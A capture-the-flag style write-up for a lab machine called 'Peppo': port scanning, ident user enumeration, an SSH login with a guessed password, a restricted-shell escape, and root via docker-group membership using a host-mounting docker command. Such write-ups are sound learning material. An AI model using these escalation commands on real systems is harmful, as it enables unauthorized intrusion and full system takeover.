# Peppo
### Nmap
```
sudo nmap 192.168.100.60 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp closed domain
113/tcp open ident FreeBSD identd
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open snet-sensor-mgmt?
```
As `ident` is running we can use the Perl script `ident-user-enum` to identify which services are running under what user.
Port 10000 reports it is running under the user 'Eleanor'. I tried Bruteforcing the username on `SSH` and had no luck. Eventually simply trying `eleanor:elenaor` I was able to log in on SSH.
We see from trying the `id` the command we are locked in with a restricted bash shell. We can check out our command availability by viewing what binaries we have access to.
Checking GTFObins for any of these binaries can spawn a shell to escape a restricted one:
After running the above command we can export a new path and then spawn a Python shell then again export the path to having full function over the shell session.
```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```
The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.
First, check what images we have available to us:
```
docker image ls
```
We can use the GTFObins command to replace the value `` with one of the images listed above.
```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```
Returning a shell as root:
{% hint style="success" %}
If you found this page helpful to you, please rate it below as per the feedback options. For any corrections or general communications, please see the root page [**Pentest Everything**](http://localhost:5000/s/-MFlgUPYI8q83vG2IJpI/) for contact information.
{% endhint %}
